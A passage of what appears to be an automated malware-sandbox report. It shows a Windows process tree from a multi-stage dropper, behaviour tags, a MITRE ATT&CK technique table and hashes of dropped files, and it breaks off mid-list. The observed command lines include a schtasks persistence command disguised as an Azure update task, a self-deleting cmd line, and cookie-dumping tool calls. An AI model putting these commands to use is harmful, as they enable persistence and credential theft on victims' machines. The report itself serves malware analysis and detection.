                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1628034545 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                          10⤵
                                                                                                                            PID:6844
                                                                                                                        • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe
                                                                                                                          "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                          9⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5448
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-3DEHN.tmp\GameBoxWin32.tmp
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-3DEHN.tmp\GameBoxWin32.tmp" /SL5="$302D0,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"
                                                                                                                            10⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Loads dropped DLL
                                                                                                                            PID:5692
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-73S2V.tmp\Daldoula.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-73S2V.tmp\Daldoula.exe" /S /UID=burnerch2
                                                                                                                              11⤵
                                                                                                                                PID:6376
                                                                                                                                • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                                                                  dw20.exe -x -s 1244
                                                                                                                                  12⤵
                                                                                                                                    PID:6128
                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe
                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"
                                                                                                                              9⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              PID:5436
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                    4⤵
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:996
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_6.exe
                                                                                                                      sonia_6.exe
                                                                                                                      5⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Adds Run key to start application
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:1748
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:3856
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4940
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        6⤵
                                                                                                                          PID:2616
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          6⤵
                                                                                                                            PID:5904
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                        4⤵
                                                                                                                          PID:740
                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 764 -s 420
                                                                                                                          4⤵
                                                                                                                          • Program crash
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1016
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                                                          4⤵
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:3416
                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    • Modifies registry class
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                    PID:3088
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                      2⤵
                                                                                                                        PID:3376
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                        2⤵
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Checks processor information in registry
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        • Modifies registry class
                                                                                                                        PID:5100
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_2.exe
                                                                                                                      sonia_2.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:2100
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_1.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_1.exe" -a
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3760
                                                                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                      1⤵
                                                                                                                      • Process spawned unexpected child process
                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                      PID:2988
                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                        2⤵
                                                                                                                          PID:3512
                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                        1⤵
                                                                                                                        • Process spawned unexpected child process
                                                                                                                        PID:5816
                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                          2⤵
                                                                                                                          • Loads dropped DLL
                                                                                                                          • Modifies registry class
                                                                                                                          PID:5872
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\F8C8.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\F8C8.exe
                                                                                                                        1⤵
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:4728
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\YYq8O0MsPa.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\YYq8O0MsPa.exe"
                                                                                                                          2⤵
                                                                                                                            PID:6972
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                              3⤵
                                                                                                                              • Creates scheduled task(s)
                                                                                                                              PID:6684
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\MMy393DRx7.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\MMy393DRx7.exe"
                                                                                                                            2⤵
                                                                                                                              PID:6828
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                cmd /Q /C C:\Users\Admin\AppData\Local\Temp/s.bat
                                                                                                                                3⤵
                                                                                                                                • Drops startup file
                                                                                                                                PID:6316
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\F8C8.exe"
                                                                                                                              2⤵
                                                                                                                                PID:4856
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout /T 10 /NOBREAK
                                                                                                                                  3⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:6752
                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                              1⤵
                                                                                                                              • Enumerates connected drives
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • Modifies registry class
                                                                                                                              PID:512
                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 010733A5F98FDD4C48EE56CBF88D29E8 C
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                PID:3212
                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding 372D4617CF2C04D70CBBA6BD7004FD2B
                                                                                                                                2⤵
                                                                                                                                • Blocklisted process makes network request
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:6096
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                  3⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:6672
                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding A19260770EC0C7CA13EAFE5D989E0A53 E Global\MSI0000
                                                                                                                                2⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                PID:5184
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\9D1.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\9D1.exe
                                                                                                                              1⤵
                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                              PID:5364
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9D1.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\9D1.exe
                                                                                                                                2⤵
                                                                                                                                  PID:1852
                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:6052
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Modifies registry class
                                                                                                                                  PID:5608
                                                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                                                C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                                1⤵
                                                                                                                                  PID:6132
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                  1⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:5128
                                                                                                                                • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                  C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:6060
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                    1⤵
                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                    PID:6852
                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                    1⤵
                                                                                                                                      PID:6272
                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                      1⤵
                                                                                                                                        PID:5980
                                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                        1⤵
                                                                                                                                          PID:7132
                                                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                                                          c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                          1⤵
                                                                                                                                            PID:4272

                                                                                                                                          Network

                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                          Execution

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Persistence

                                                                                                                                          Modify Existing Service

                                                                                                                                          1
                                                                                                                                          T1031

                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                          1
                                                                                                                                          T1060

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          BITS Jobs

                                                                                                                                          1
                                                                                                                                          T1197

                                                                                                                                          Privilege Escalation

                                                                                                                                          Scheduled Task

                                                                                                                                          1
                                                                                                                                          T1053

                                                                                                                                          Defense Evasion

                                                                                                                                          Modify Registry

                                                                                                                                          5
                                                                                                                                          T1112

                                                                                                                                          Disabling Security Tools

                                                                                                                                          3
                                                                                                                                          T1089

                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                          1
                                                                                                                                          T1497

                                                                                                                                          BITS Jobs

                                                                                                                                          1
                                                                                                                                          T1197

                                                                                                                                          Install Root Certificate

                                                                                                                                          1
                                                                                                                                          T1130

                                                                                                                                          Credential Access

                                                                                                                                          Credentials in Files

                                                                                                                                          4
                                                                                                                                          T1081

                                                                                                                                          Discovery

                                                                                                                                          Query Registry

                                                                                                                                          7
                                                                                                                                          T1012

                                                                                                                                          Virtualization/Sandbox Evasion

                                                                                                                                          1
                                                                                                                                          T1497

                                                                                                                                          System Information Discovery

                                                                                                                                          7
                                                                                                                                          T1082

                                                                                                                                          Security Software Discovery

                                                                                                                                          1
                                                                                                                                          T1063

                                                                                                                                          Peripheral Device Discovery

                                                                                                                                          2
                                                                                                                                          T1120

                                                                                                                                          Collection

                                                                                                                                          Data from Local System

                                                                                                                                          4
                                                                                                                                          T1005

                                                                                                                                          Command and Control

                                                                                                                                          Web Service

                                                                                                                                          1
                                                                                                                                          T1102

                                                                                                                                          Replay Monitor

                                                                                                                                          Loading Replay Monitor...

                                                                                                                                          Downloads

                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                            MD5

                                                                                                                                            7f10f9e8ae3e736e6b3f839a4eb42f24

                                                                                                                                            SHA1

                                                                                                                                            6b5991b57dad3a7633ae6879e1e3e5c11ae38d87

                                                                                                                                            SHA256

                                                                                                                                            75bf444bb06c3eb5dad2444f9b0dbdea7ec8fd5542337cabe9088d12df3b60c6

                                                                                                                                            SHA512

                                                                                                                                            e647ba9ed7abb21fad66dbe5c5353b980d8359d2850fe39435a0defd85c5226f6fba52d00600f4d4d2d55041b864d436e6307cf248e4881b78a31961b9302c9f

                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                            MD5

                                                                                                                                            2a5f42ab890cb92e44a99b519c8d4e0e

                                                                                                                                            SHA1

                                                                                                                                            665769378baf2b9a333ec703a2f7787340eb47c0

                                                                                                                                            SHA256

                                                                                                                                            b1cd725d452d71ef8b012908748673bdcadac25805975738d6a65884ab70b7f5

                                                                                                                                            SHA512

                                                                                                                                            e93550732ae80ebde7303072212e285050ed37344f0813b065912518d1fc3c29cc88bf56d586c40f108ab98e0d717d08cc3906c25f3acf799745206aacc8ee20

                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                                            MD5

                                                                                                                                            5a70422844b2fc7c3405f1ab145c449b

                                                                                                                                            SHA1

                                                                                                                                            c0ea7f643d598e582566afa536fac13e095d9672

                                                                                                                                            SHA256

                                                                                                                                            40a9de7eff5228ce3a0de058c86587753900f348c31840a300fefa0dbdbf7c5f

                                                                                                                                            SHA512

                                                                                                                                            7cc128cbecadd0dcd0a06d1d154aaec74a08e9f2be168eba7091315afa46272d4827899e802bc8c1b3384e76799f51d8b01886f1452c1ddefc64ae87615738fd

                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                                            MD5

                                                                                                                                            76ef58a05b748758638203852aa0e1fe

                                                                                                                                            SHA1

                                                                                                                                            3ba471291d2fc6d2e83e46195b75eb29caa56cf3

                                                                                                                                            SHA256

                                                                                                                                            171a450a58ecffe6daf89746e5ec9d9d6cb7ed6ac0ebc1e35b7b51519c8cf97b

                                                                                                                                            SHA512

                                                                                                                                            058da0c3e2ee4830873db68bd0711c9bfd832b08caf75c58b45bc010124b07698531d65e9c0fee00c23ffc90c8d64f728d50376de357441680c7fab5f21b33b7

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\libcurl.dll
                                                                                                                                            MD5

                                                                                                                                            d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                            SHA1

                                                                                                                                            028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                            SHA256

                                                                                                                                            0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                            SHA512

                                                                                                                                            857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\libcurlpp.dll
                                                                                                                                            MD5

                                                                                                                                            e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                            SHA1

                                                                                                                                            b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                            SHA256

                                                                                                                                            43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                            SHA512

                                                                                                                                            9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\libgcc_s_dw2-1.dll
                                                                                                                                            MD5

                                                                                                                                            9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                            SHA1

                                                                                                                                            64264300801a353db324d11738ffed876550e1d3

                                                                                                                                            SHA256

                                                                                                                                            59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                            SHA512

                                                                                                                                            0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\libstdc++-6.dll
                                                                                                                                            MD5

                                                                                                                                            5e279950775baae5fea04d2cc4526bcc

                                                                                                                                            SHA1

                                                                                                                                            8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                            SHA256

                                                                                                                                            97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                            SHA512

                                                                                                                                            666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\libwinpthread-1.dll
                                                                                                                                            MD5

                                                                                                                                            1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                            SHA1

                                                                                                                                            fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                            SHA256

                                                                                                                                            509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                            SHA512

                                                                                                                                            3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\setup_install.exe
                                                                                                                                            MD5

                                                                                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                            SHA1

                                                                                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                            SHA256

                                                                                                                                            0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                            SHA512

                                                                                                                                            c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\setup_install.exe
                                                                                                                                            MD5

                                                                                                                                            a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                            SHA1

                                                                                                                                            e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                            SHA256

                                                                                                                                            0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                            SHA512

                                                                                                                                            c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_1.exe
                                                                                                                                            MD5

                                                                                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                                                                                            SHA1

                                                                                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                            SHA256

                                                                                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                            SHA512

                                                                                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_1.exe
                                                                                                                                            MD5

                                                                                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                                                                                            SHA1

                                                                                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                            SHA256

                                                                                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                            SHA512

                                                                                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_1.txt
                                                                                                                                            MD5

                                                                                                                                            6e43430011784cff369ea5a5ae4b000f

                                                                                                                                            SHA1

                                                                                                                                            5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                                            SHA256

                                                                                                                                            a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                                            SHA512

                                                                                                                                            33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_2.exe
                                                                                                                                            MD5

                                                                                                                                            18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                            SHA1

                                                                                                                                            f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                            SHA256

                                                                                                                                            365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                            SHA512

                                                                                                                                            db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_2.txt
                                                                                                                                            MD5

                                                                                                                                            18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                                                                            SHA1

                                                                                                                                            f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                                                                            SHA256

                                                                                                                                            365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                                                                            SHA512

                                                                                                                                            db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_3.exe
                                                                                                                                            MD5

                                                                                                                                            ee658be7ea7269085f4004d68960e547

                                                                                                                                            SHA1

                                                                                                                                            979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                            SHA256

                                                                                                                                            d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                            SHA512

                                                                                                                                            fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_3.txt
                                                                                                                                            MD5

                                                                                                                                            ee658be7ea7269085f4004d68960e547

                                                                                                                                            SHA1

                                                                                                                                            979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                                                                            SHA256

                                                                                                                                            d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                                                                            SHA512

                                                                                                                                            fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_4.exe
                                                                                                                                            MD5

                                                                                                                                            6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                            SHA1

                                                                                                                                            cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                            SHA256

                                                                                                                                            755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                            SHA512

                                                                                                                                            c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_4.txt
                                                                                                                                            MD5

                                                                                                                                            6765fe4e4be8c4daf3763706a58f42d0

                                                                                                                                            SHA1

                                                                                                                                            cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                                                                            SHA256

                                                                                                                                            755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                                                                            SHA512

                                                                                                                                            c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_5.exe
                                                                                                                                            MD5

                                                                                                                                            0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                            SHA1

                                                                                                                                            0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                            SHA256

                                                                                                                                            8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                            SHA512

                                                                                                                                            bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_5.txt
                                                                                                                                            MD5

                                                                                                                                            0c3f670f496ffcf516fe77d2a161a6ee

                                                                                                                                            SHA1

                                                                                                                                            0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                                                                            SHA256

                                                                                                                                            8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                                                                            SHA512

                                                                                                                                            bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS8DE91944\sonia_6.exe
                                                                                                                                            MD5

                                                                                                                                            2eb68e495e4eb18c86a443b2754bbab2

